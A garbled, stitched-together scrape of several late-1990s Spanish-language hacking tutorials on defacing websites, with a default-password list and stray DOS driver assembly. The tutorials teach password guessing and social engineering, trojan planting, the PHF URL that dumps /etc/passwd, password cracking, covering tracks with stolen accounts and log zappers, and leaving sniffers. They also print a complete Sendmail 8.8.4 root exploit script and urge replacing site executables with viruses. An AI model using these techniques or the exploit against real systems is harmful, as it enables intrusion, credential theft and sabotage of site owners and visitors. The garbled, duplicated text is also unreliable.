Академический Документы
Профессиональный Документы
Культура Документы
1. Introduccion
Si alguna vez has hechado
que seria comico remover
aun borrar toda la pagina
venganza. Pues bien, este
2. Websites
Password:
root
root
sys
sys
daemon
root
system
sys
system
daemon
uucp
tty
test
unix
unix
bin
adm
adm
admin
admin
sysman
sysman
sysman
sysadmin
sysadmin
sysadmin
sysadmin
sysadmin
who
learn
uuhost
guest
host
nuucp
rje
games
games
sysop
root
demo
uucp
tty
test
unix
test
bin
adm
admin
adm
admin
sysman
sys
system
sysadmin
sys
system
admin
adm
who
learn
uuhost
guest
host
nuucp
rje
games
player
sysop
sysop
demo
Computadora
586
586
586
586
academia
airplane
alex
alisa
amy
andrea
arrow
athena
bailey
bass
beaver
deb
desire
digital
drought
edges
einstein
emerald
enzyme
fairway
format
jester
joshua
kathleen
lambda
leroy
louis
macintosh
marty
maurice
michael
nicki
ada
albany
alexander
alpha
analog
animal
arthur
atmosphere
banana
batman
daniel
debbie
desperate
discovery
duncan
edwin
elephant
engine
euclid
felicia
god
john
judith
kermit
larry
lewis
love
mack
marvin
maximum
michelle
nicole
adrian
albatros
algebra
alphabet
anchor
answer
ass
bacchus
bandit
beautiful
danny
deborah
develop
disney
easy
egghead
elizabeth
engineer
evelyn
fender
hello
johnny
juggle
kernel
lazarus
light
lynne
maggot
matt
merlin
mike
rascal
really
reagan
ronald
roses
sal
secret
shark
shuttle
single
smother
socrates
success
surfer
target
tiger
toyota
unknown
virginia
whatnot
william
wonbat
rebecca
robot
rose
ruben
saxon
sensor
sharon
simon
singing
snatch
spit
summer
suzanne
taylor
tigger
trivial
urchin
warren
whitney
winston
yosemite
remote
robotics
rosebud
rules
scheme
serenity
shit
simple
smile
snoopy
spring
super
tangerine
telephone
toggle
unhappy
utility
water
will
willie
zap
rick
rolex
rosemary
ruth
scott
sex
shiva
singer
smooch
soap
subway
support
tape
temptation
tomato
unicorn
vicki
weenie
virgin
wizard
whatnow
P A S S W O R D
E N G I N E (for IBM PC's)
Armpit
+++++++++++++++++++++++++++++++++++++++++++++
Que tan practico es?
by Uncle
dev_strategy:
mov cs:rh_seg,es
mov cs:rh_ofs,bx
retf
;strategy routine
dev_int:
pushf
push ds
push es
push ax
push bx
push cx
push dx
push di
push si
;interrupt routine
cld
push cs
pop ds
mov bx,cs:rh_seg
mov es,bx
mov bx,cs:rh_ofs
mov
rol
mov
xor
add
jmp
al,es:[bx]+2
al,1
di,offset cmdtab
ah,ah
di,ax
word ptr[di]
cmdtab:
dw init
dw exit3
dw exit3
dw ioctl_read
dw do_read
dw exit3
dw exit3
dw exit3
dw exit3
;command table
;0
;1
;2
;3
;4
;5
;6
;7
;8
dw
dw
dw
dw
dw
dw
exit3
;9
exit3
;10
exit3
;11
ioctl_write ;12
exit3
;13
5 dup (offset exit3)
ioctl_read:
push es
push bx
mov si,es:[bx+10h]
mov di,es:[bx+0eh]
mov es,si
push cs
pop ds
mov si,offset number
xor cx,cx
get_char:
lodsb
stosb
inc cl
cmp al,0ah
jz ioctl_rend
jmp get_char
ioctl_rend:
pop bx
pop es
mov es:[bx+012h],cx
mov cs:countr,offset number
jmp exit2
ioctl_write:
push es
push bx
mov si,es:[bx+010h]
mov ds,si
mov si,es:[bx+0eh]
mov cx,numsize+1
push cs
pop es
mov di,offset number
repe movsb
pop es
pop bx
mov cs:countr,offset number
jmp exit2
;es:[bx+012h]
do_read:
push es
push bx
push cs
pop ds
mov si,[countr]
inc si
cmp si,offset afternum
jnz is_okay
mov si,offset number
call inc_num
is_okay:
mov [countr],si
mov di,es:[bx]+0eh
mov ax,es:[bx]+010h
mov cx, es:[bx]+012h
jcxz clean_up
mov es,ax
repe movsb
clean_up:
pop bx
pop es
jmp exit2
at_eof:
;send EOF
push es
push cs
pop ds
push cs
pop es
mov si,offset number
mov di,offset tmpnum
cld
_again:
lodsb
cmp al,0ah
jz _nomorechars
stosb
jmp _again
_nomorechars:
mov si,offset msgend
mov cx,4
repe movsb
mov ah,09
mov dx,offset msg1
int 21h
pop es
ret
initial endp
init: call initial
mov ax,offset at_eof
mov es:[bx]+0eh,ax
push cs
pop ax
mov es:[bx]+010h,ax
mov cs:word ptr cmdtab,offset exit3
jmp exit2
msg1
Le PompaItor
* Introduccin
* Diferencias en los tipos de WEB
* Obteniendo Passwords en el tipo A.
1 INTRODUCIN
El objetivo de este documento es el dar a conocer posibles formas de alteracin del contenido de una
pgina WEB por personal no autorizado a ello ( llammoslo hacking ;)).
No me hago responsable del uso que se pueda hacer de este documento, pues su nica finalidad es la de
informar, y el que lo use para otra cosa... lo hace bajo SU entera responsabilidad... Queda claro ?, si no
te parece bien deja de leer y borra el fichero de tu HD ( disco duro para los muy novatos...).
Las cosas que se describen en este fichero no te aseguran xito seguro, probablemente en la mayora de
los casos solo te sirvan para empezar, teniendo que improvisar tu, pero prometo que este doc. ser mejor
que los que he visto sobre el tema en Internet.
El nivel de este documento es bsico, pues no intenta ensear todo en un dia, mas que nada saber como
empezar a hacer algo digamos "util".
Nota: A pesar de que podras hacer todo lo que aqu pone desde Windows 95 o 98, te recomiendo que
pruebes algun Linux (aunque sea el Trinux, que cabe en 3 disketes xPPP (www.trinux.org)). Este
documento esta escrito en WORD pk lo tiene todo cristo ( jeje casi todos ilegal para que se joda
Microsoft (con perdon)).
Creo que para que nos entendamos mejor, es importante distinguir entre dos clases de WEBs, las webs
personales, que pueden ser modificadas por el usuario propietario mediante su clave (tipo Geocities,
Xoom y los proveedores de acceso a Inet que ofrecen espacio WEB).
El segundo tipo, serian aquellas WEBs, llamemoslas "principales" de un servidor, que solo pueden ser
modificadas por usuarios con muy altos privilegios (llamemosles "root" o "administrador").
Pues que bien no?, y esta diferenciacin tan chorra... para que vale?... pues la utilizaremos para
diferenciar las formas de hacernos con los passwords que nos dejan modificarlas... evidentemente no es
igual de facil conseguir ser root en un server que tener una cuenta de usuario... asi que para esto es la
diferenciacin.
Estos passwords de usuarios, generalmente no muy cualificados, se caracterizan por ser muy chorras,
osea faciles de recordar, repetidos con los passwords de otras cosas... asi que si la persona propietaria de
las WEB es alguien cercano a ti, puedes empezar provando algunas palabras que te puedan parecer
"interesantes" ( nombre del perro, mujer, hijos, fecha de nacimiento, lugar de residencia...), pero
tampoco te mates mucho provando pues esto es perder el tiempo muchas veces, asi que si a los 10 o 11
intentos ( segn tu paciencia ) no sale nada, mejor dejes esta forma ;)
Pero tambin seria una buena idea intentar sacar el password a la "victima" a traves de engaos y demas
( lo llaman ingenieria social...), por ejemplo puedes ligarte al tio/a y conseguir que te diga su pass... o
tambien puedes intentar meterle un troyano tipo BO o NETBUS, que te permitiran sacarle las pass,
evidentemente no voy a contar aqu lo que le tienes que decir a la victima para que te crea... eso tendras
que currelarlo tu un pokito
Ademas, si conseguimos el fichero de passwords del servidor... Estamos de suerte!! Pues generalmente
los passwords de usuario son bastante fciles de crackear... solo elige el usuario y pon el john the ripper
a trabajar ( el john es uno de los programas de cracking de ficheros PASSWD de UNIX mas conocidos,
file:///F|/Temp/Nueva carpeta (2)/hackpag/hackpag.htm (16 of 29)15/07/2005 08:16:39 p.m.
Normalmente los administradores de los servidores no se chupan el dedo, asi que conseguir el fichero o
el root directamente a traves de un exploit ( programa que se aprovecha de un BUG o agujero en el
sistema operativo) no sea una tarea facil.
Lo primero que puedes intentar es pillar el passwd por el FTP... y cuando eso no te haya funcionado
probar el PHF ( escribir la siguiente linea en tu navegador: http://www.host.com/cgi-bin/phf?Qalias=%
0a/bin/cat%20/etc/passwd , donde host.com es el nombre del servidor...), si el phf funcionase ( en estos
tiempos ya suele estar parcheado en casi todos los servidores, asi que si no te sirve no te deprimas),
tendrias en tu pantalla el fichero passwd, pero antes de alegrarte fijate en algo, si aparece:
root:*:0:0:Charlie &:/root:/bin/csh
( un asterisco (*) detrs del nombre "root" y los dos puntos, tambin puede aparecer una equis (x)...),
querra decir que el fichero esta shadow osea que aparte del PASSWD necesitas otro archivo... el
SHADOW, puedes intentar sacarlo con PHF cambiando la palabra passwd del final de la linea del PHF
por la palabra shadow ( para ser un poco mas explicito puedes jugar con el phf, cambiando de
directorio... supongo que te estaras dando cuenta de cmo y si no, hay va una pista... "etc" es el nombre
de un directorio ).
Y donde los compilo ?, pues o el propio server ( con gcc ) o en otro con el mismo SO, ojo no puedes
compilar exploits para un SUN en un linux Red Hat ... una vez que lo tengas compilado lo ejecutas... y a
jugar!
Despues de todo esto, y otro poco por tu parte seguramente ya tengas root en algun pequeo server para
provar... (recuerda si no tienes mucha soltura... empieza por china o por alli lejotes... que si te pillan no
se meteran mucho contigo verdad?).
4 PRECAUCIONES
Pues eso... procura no usar cuentas verdaderas para conectar ( aunque piensa que si dejas huellas... los
marrones seran pal dueo de la cuenta, y eso no esta bien..., asi que cuidado con las cuentas de internet
robadas, solo usar las que sepais que el dueo es un verdadero hijoputa o algo asi... o mejor si usas
servidores "intermedios" o borras las huellas con algun zapper ( si lo usas sastamente como un exploit)...
ahh, si te kurrelas un root y tal, pues deja algun sniffer y eso para recoger la cosecha... ( mas ke na no
desperdiciar kurro ya hecho).
5 SOBRE EL AUTOR
Pues el capullo que escribe todo esto es CHEvARA, individuo que podreis encontrar en el IRC hispano
por #scripting, #hack o #comunistas, cuya WEB por si quieres verla es:
chevara@hotmail.com .
Me he decidido a escribir esto simplemente porque ley un doc sobre el tema tan malo que me dije... por
muy mal que lo haga yo seguro que queda algo mas "util", y aqu esta, espero que a alguien le sirva de
algo...
CopyRight by CHEvARA 98
Saludos para todos mis colegas del IRC y para los demas miembros de GHT.
Si quieres poner este doc. en una web o FTP, por favor avisame ( no pedir permiso, sino avisar para que
me haga ilu y me emociones y todo eso ... xP )
(BlackJack Ago-97)
blackbot@hotmail.com
http://www.redestb.es/personal/lcd
Bien.. seguro que este es uno de los puntos que ms interesa a los hackers novatillos...
Ante la falta de documentos de este tipo en castellano, he decidido crear este yo mismo.
No voy a explicar todas las tcnicas que se pueden usar para conseguirlo, (ya no las se).
Las tcnicas son infinitas. Por cada agujero posible en un sistema, hay una tcnica. Solo
es necesario encontrar la adecuada. Antes que nada debemos inspeccionar el lugar que vamos
a "visitar". Debemos buscar todos los posibles accesos al sistema... (telnet, ftp, etc...)
COGIENDO EL FICHERO DEL PASSWORD A TRAVES DE FTP
Ok, bien... Una de las formas ms facil de conseguir ser "superusuario" en el sistema es
accediendo a traves de ftp annimoal fichero "passwd". Primero necesitas conocer algo sobre
los ficheros password:
root:User:g36Dfr:1j2YF6:1256:20:Superuser
Camilo:p5P:h0iuE:2552:20:Camilo,:/usr/personal/camilo:/bin/csh
BlackJack:EUhg3zACG2ab:1128:20:BlacJack LCD:/usr/personal/lcd:/bin/csh
Este es el ejemplo de un fichero encriptado normal. El superusuario es la parte que te da
el root. Es la parte que nos interesa.
root:*:0:1:Misericordios:/:/bin/sh
ftp:*:202:102:Anonymous FTP:/U1/ftp
ftpadmin:*:203:102:ftp Administrator:/u1/ftp
Este es otro ejemplo de un fichero password, solo que este tiene una pequea diferencia
este est controlado. Los password controlados no te dejan ver o copiar el actual password
encriptado . Esto causa problemas para el Cracker y el diccionario que uses (despus se explica).
Losiguiente es otro ejemplo de otro password controlado:
root:*:0:1:0000-Admin(0000):7:/usr/bin/csh
daemon:*:1:1:0000-Admin(0000):/:
bin:*:2:2:0000-Admin(0000):/usr/bin:
etc...
los password controlados tienen un "*" o "x" en el lugar donde va el password.
Ahora que tu conoces un poco ms acerca de como identificar un password encriptado de un
password controlado, podemos hablar de como crackearlo.
Cracker un password no es tan complicado como parece. Los archivos varan de sistema a sistema.
Debemos antes que nada, de hacernos con el fichero passwd.
Bajatelo a tu disco duro. Una vez lo tengas en tu disco duro necesitas un cracker y un
file:///F|/Temp/Nueva carpeta (2)/hackpag/hackpag.htm (20 of 29)15/07/2005 08:16:39 p.m.
diccionario. Puedes usar el Cracker Jack, John the ripper (aconsejado), jack the ripper,
brute force cracker.... Los puedes encontrar en cualquier pgina de hacking, incluido la ma.
http://www.redestb.es/personal/lcd
Cuando ejecutes el cracker, deberas indicar cual es el fichero passwd. Hay muchos sistemas para
buscar el passwd. Aqui es donde actua el diccionario. Un diccionario encuentra todas
las posibles combinaciones posibles con el alfabeto que uses, incluyendo toda clase de
caracteres "raros". Lo normal es que tenga predefinido miles de palabras posibles.
Si este mtodo no funciona se hace un rastreo completo, probando todas las combinaciones
posibles desde 1 caracter hasta el total permitido. Asi SIEMPRE lo encuentra, aunque el
problema est en que tarda mucho. Una vez tengas el password, YA ESTA!!!
tendrs acceso a todo el sistema.
TECNICA PHF
la tecnica del phf es una de la ms vieja (y que menos suele funcionar,tambien hay que decirlo)
de conseguir un password. Es Imprescindible probarla siempre. (por probar que no quede...)
ya que no cuesta nada y aveces se encuentra a alguna vctima que cae.
Todo lo que debes hacer es abrir tu "notescapes navegando" y escribir lo siguiente:
http://www.web_a_hackear.es/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
reemplaza www.web_a_hackear.es por el dominio.
y ya est!. acontinuacin se empezar a transmitir una linda copia del fichero con
los password (si funciona, claro est).
REDES LOCALES
Otro sistema es buscar la direccion IP del dominio a hackear. Todas las mquinas conectadas
a la red tienen una direccin IP. por ejemplo:
www.probando.com
debemos averiguar el IP de este servidor. (no me jodas con que no sabes como).
hay miles, no, millones de programitas que te lo dicen.
(hasta con el 7thsphere port fuck que viene con el sript de irc de mismo nombre, te lo dice)
suponiendo que fuese:
194.179.23.100
esto es la direccin IP de la mquina central. Tal vez inaccesible, pero si tiene una red local
conectada a esta.. (ordenador del diseador, del director... que se yo!)
las mquinas de la red tendrn un IP muy parecido. Sabes lo que puede pasar si en tu
navegador escribes lo siguiente?:
194.179.23.101 o 194.179.23.102 ... etc...
que acceders a los ordenadores que estn en esa red local (siempre y cuando sean tan capullos
de no protegerlos porque no estn cara al pblico!)
curioso no?
DIRECTORIOS OCULTOS
Este mtodo aunque parezca una chorrada... te juro que no lo es.
Te voy a narrar algo que paso por diciembre del 96 a un amigo hacker....
...a ver... voy a hackear un servidor de Internet...
este esta bien. Son novatos. Mucho mejor, seguro que tendrn
un huevo de fallos. Tendrn ftp anonimo?
Login: anonymous
passworD: anonymous
yeah! hay ftp annimo con programitas shareware jeje....
mmmm... no est el directorio etc/ ....
vamos a ver si deja cambiar de directorio. igual est oculto.
-chg directory
cambiar a /etc
no existe. igual lo tienen protegido.
cambiar a /administrador
no existe.
cambiar a /administrator
SI EXISTE... hehehe
que hay en este directorio... etc/ bin/ mail/ (joder!) etc.....
joder! si estn las pginas web aqui!
y el correo electrnico y todo!
ah!. Soy un hacker no un criminal.
A pesar de poder abrirse cuenta de acceso a internet, leer correos electrnicos
etc... solo cambi la pgina web.
el servidor en cuestin es conexin global internet (http://www.cglobal.com)
aunque el nombre cambi durante un da por "conexin mamadn internet"
hehehe... ya no tienen ftp anonimo. (mira a ver). es que los hay capullos.
Por probar que no quede. A probar todo lo que se te ocurra.
Si el servidor es de WinNT mejor que mejor! ms rpido caer.
probar con directorios ocultos tipo:
/root
/pub
/bin
/etc
/administrador
/administrator
/lo que se te ocurra.
Hay otros mtodos, los ms eficaces (y ms complicados) por Telnel, pero lo dejar para
nmeros siguientes.
file:///F|/Temp/Nueva carpeta (2)/hackpag/hackpag.htm (22 of 29)15/07/2005 08:16:39 p.m.
Ok ?
bye!
BlackJack 97
Light Cracking Distribution
http://www.redestb.es/personal/lcd
CONTENIDOS
1.- Disclaimer
2.- Introduccion
3.- Comenzando el ataque
4.- Obtencion del fichero de Passwd
5.- Usando Exploits
6.- Y recuerda....
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
DISCLAIMER
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
El contenido de este texto esta solamente destinado a usos educacionales,
de investigacion y de desarrollo. En ningun momento el creador de este
texto se hace responsable de los daos causados debido a un mal uso de el
mismo.
file:///F|/Temp/Nueva carpeta (2)/hackpag/hackpag.htm (23 of 29)15/07/2005 08:16:39 p.m.
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
INTRODUCCION
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
Si alguna vez se te ha ocurrido que seria divertido cambiar algunas
cuantas cosillas de alguna web o de aduearte de alguna, este texto es
para ti.
Si tu enemigo tiene una web y quieres acabar con ella este texto es para ti.
O si simplemente quieres conocer las posibilidades del hacking este texto
es para ti.
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
COMENZANDO EL ATAQUE
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
Lo primero que hay hacer es localizar al servidor victima...
(e.j.)
http://www.victima.com <----------- Victima
Despues recopila la mayor cantidad de informacion sobre el servidor
victima por ejemplo su IP, DNS, version de Sendmail, etc.
La mayoria de las veces el servidor que contiene la web-page del site
solo tiene unos cuantos logins como el del root y el de algunos
cuantos administradores pero para saber cuales y cuantos usuarios, necesitas
el fichero de passwd.
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
OBTENCION DEL FICHERO DE PASSWD
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
Hay varias formas de entrar, una de ellas seria obteniendo el archivo
de passwd pero como? bueno he aqui algunas formas.
Nota para Newbies: Si entras al servidor por ftp con el usuario
file:///F|/Temp/Nueva carpeta (2)/hackpag/hackpag.htm (24 of 29)15/07/2005 08:16:39 p.m.
%o
(to)www.victima.com
Trying 255.255.255.0 ....
Escape character is '^]'.
Linux 2.0.0 (www.victima.com) (tty2)
login:XXXXXXXX
passwd:XXXXXXXX
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
USANDO EXPLOITS
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
La forma mas sencilla de hackear una web-page es usando exploits he aqui uno
que te hara root en Sendmail 8.8.4.
--------------------------------- CORTA AQUI --------------------------------cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include<stdio.h>
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
file:///F|/Temp/Nueva carpeta (2)/hackpag/hackpag.htm (26 of 29)15/07/2005 08:16:39 p.m.
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"//
|cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include<stdio.h>
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
>
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
file:///F|/Temp/Nueva carpeta (2)/hackpag/hackpag.htm (27 of 29)15/07/2005 08:16:39 p.m.
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"//
|cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
--------------------------------- CORTA AQUI --------------------------------Hay infinidad de exploits como este en la red si deseas links a paginas
que continen cientos revisa la seccion de links de la revista Raregazz.
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
Y RECUERDA ...
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
Bien ya tengo el root o una cuenta de algun administrador ahora que?, pues
ahora sigue la parte mas divertida.
Estando como root bajas todos los archivos de la pagina y despues los
editas cada archivo guardalo con el mismo nombre que tenia para ahorrarte
trabajo, luego editas la web-page.
Usa tu imaginzacion por ejemplo si hay archivos executables
remplazalos por virus cambia los links modifica las imagenes etc. ahora
reemplazas los antiguos archivos por los nuevos recuerda que el chiste es
hacer cambios que no llamen mucho la atencion para que los Admins no se den
cuenta y dure mas tiempo.
Y recuerda |-|4cK t|-|3 \/\/0r1d ....